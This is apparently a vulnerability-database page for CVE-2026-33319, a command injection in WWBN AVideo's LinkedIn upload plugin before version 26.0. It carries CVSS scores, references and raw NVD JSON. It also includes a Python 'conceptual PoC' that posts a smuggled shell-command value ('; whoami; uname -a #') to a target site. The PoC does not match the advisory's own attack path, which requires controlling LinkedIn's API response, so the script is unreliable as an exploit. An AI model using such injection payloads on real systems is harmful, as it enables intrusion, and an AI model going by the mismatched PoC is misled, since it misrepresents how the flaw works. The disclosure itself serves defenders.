CVE-2026-33319

Description

WWBN AVideo is an open source video platform. Prior to version 26.0, the `uploadVideoToLinkedIn()` method in the SocialMediaPublisher plugin constructs a shell command by directly interpolating an upload URL received from LinkedIn's API response, without sanitization via `escapeshellarg()`. If an attacker can influence the LinkedIn API response (via MITM, compromised OAuth token, or API compromise), they can inject arbitrary OS commands that execute as the web server user. Version 26.0 contains a fix for the issue.

CVSS Details

CVSS Score

5.9

Severity

MEDIUM

CVSS Vector

CVSS:3.1/AV:N/AC:H/PR:H/UI:N/S:U/C:H/I:H/A:N

Configurations (Affected Products)

cpe:2.3:a:wwbn:avideo:*:*:*:*:*:*:*:* - VULNERABLE

WWBN AVideo < 26.0

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

import requests

# Conceptual PoC for CVE-2026-33319
# Demonstrates how a malicious LinkedIn API response could trigger RCE

target_url = "http://target-avideo-site/plugin/SocialMediaPublisher/uploadVideoToLinkedIn.json"

# The attacker controls the 'upload_url' field in the API response
# Payload structure: [valid_url_prefix]; [malicious_command]; #[comment]
malicious_upload_url = "https://api.linkedin.com/upload; whoami; uname -a #"

payload = {
    "users_id": "1",
    "video_id": "1",
    "providers_id": "linkedin",
    "response": f'{{"upload_url": "{malicious_upload_url}"}}'
}

print(f"Sending payload to {target_url}...")

try:
    response = requests.post(target_url, data=payload)
    print(f"Status Code: {response.status_code}")
    print("Response:")
    print(response.text)
except Exception as e:
    print(f"Exploit failed: {e}")

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2026-33319
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2026-33319
[3] CVE Details https://www.cvedetails.com/cve/CVE-2026-33319/
[4] VulDB https://vuldb.com/cve/CVE-2026-33319
[5] https://github.com/WWBN/AVideo/commit/67d932eb05e1bc9b36796f73ff4f9fb47590598b
[6] https://github.com/WWBN/AVideo/security/advisories/GHSA-w5ff-2mjc-4phc

Raw JSON Data

JSON

{"cve": {"id": "CVE-2026-33319", "sourceIdentifier": "[email protected]", "published": "2026-03-22T17:17:09.573", "lastModified": "2026-03-24T19:07:50.050", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "WWBN AVideo is an open source video platform. Prior to version 26.0, the `uploadVideoToLinkedIn()` method in the SocialMediaPublisher plugin constructs a shell command by directly interpolating an upload URL received from LinkedIn's API response, without sanitization via `escapeshellarg()`. If an attacker can influence the LinkedIn API response (via MITM, compromised OAuth token, or API compromise), they can inject arbitrary OS commands that execute as the web server user. Version 26.0 contains a fix for the issue."}, {"lang": "es", "value": "WWBN AVideo es una plataforma de video de código abierto. Antes de la versión 26.0, el método 'uploadVideoToLinkedIn()' en el plugin SocialMediaPublisher construye un comando de shell interpolando directamente una URL de carga recibida de la respuesta de la API de LinkedIn, sin sanitización a través de 'escapeshellarg()'. Si un atacante puede influir en la respuesta de la API de LinkedIn (a través de MitM, un token OAuth comprometido o un compromiso de la API), puede inyectar comandos arbitrarios del sistema operativo que se ejecutan como el usuario del servidor web. La versión 26.0 contiene una solución para el problema."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:H/PR:H/UI:N/S:U/C:H/I:H/A:N", "baseScore": 5.9, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "HIGH", "privilegesRequired": "HIGH", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "NONE"}, "exploitabilityScore": 0.7, "impactScore": 5.2}, {"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H", "baseScore": 7.5, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "HIGH", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 1.6, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-78"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:wwbn:avideo:*:*:*:*:*:*:*:*", "versionEndExcluding": "26.0", "matchCriteriaId": "B468F0CE-E5E7-4607-BD15-B5763C47493E"}]}]}], "references": [{"url": "https://github.com/WWBN/AVideo/commit/67d932eb05e1bc9b36796f73ff4f9fb47590598b", "source": "[email protected]", "tags": ["Patch"]}, {"url": "https://github.com/WWBN/AVideo/security/advisories/GHSA-w5ff-2mjc-4phc", "source": "[email protected]", "tags": ["Exploit", "Vendor Advisory"]}]}}